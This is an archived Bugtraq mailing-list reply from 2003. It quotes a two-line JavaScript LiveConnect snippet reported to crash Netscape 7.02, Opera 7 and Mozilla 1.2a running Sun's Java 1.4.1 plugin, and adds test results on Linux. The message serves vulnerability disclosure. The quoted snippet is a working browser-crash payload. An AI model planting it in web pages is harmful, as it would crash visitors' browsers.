[29544] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Netscape and Opera crash via java

daemon@ATHENA.MIT.EDU (Wayne D. Hoxsie Jr.)
Fri Mar 28 16:20:58 2003

Date: Fri, 28 Mar 2003 13:04:55 -0600 (CST)
From: "Wayne D. Hoxsie Jr." <wayne@hoxnet.com>
Reply-To: wayne@hoxnet.com
To: bugtraq@securityfocus.com
In-Reply-To: <Pine.A41.4.44.0303281558351.60662-100000@zivunix.uni-muenster.de>
Message-ID: <Pine.LNX.4.50.0303281300390.20524-100000@sagan.hoxnet.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Fri, 28 Mar 2003, Marc Schoenefeld wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> executing
>
> <scr1pt language="Javascript">
> t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
> </scr1pt>
>
> crashes Netscape 7.02 and Opera 7 on Windows XP.
> The active JVM in both tested browsers is Java 1.4.1_02 from Sun.
>
> This liveconnect (javascript-2-java-communication) stuff seems
> to be still very dangerous.
>
> Sincerely
> Marc Schoenefeld

I tested it on the two versions of linux/mozilla I have immediately
available:

Crashes Mozilla 1.2a
  (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2a) Gecko/20020910)

Does not crash Mozilla 1.0
  (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020605)

-- 
Wayne D. Hoxsie Jr.
wayne@hoxnet.com
http://www.hoxnet.com
PGP Key ID 138BCEE1


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[29544] in bugtraq

Re: Netscape and Opera crash via java

daemon@ATHENA.MIT.EDU (Wayne D. Hoxsie Jr.)Fri Mar 28 16:20:58 2003

daemon@ATHENA.MIT.EDU (Wayne D. Hoxsie Jr.)
Fri Mar 28 16:20:58 2003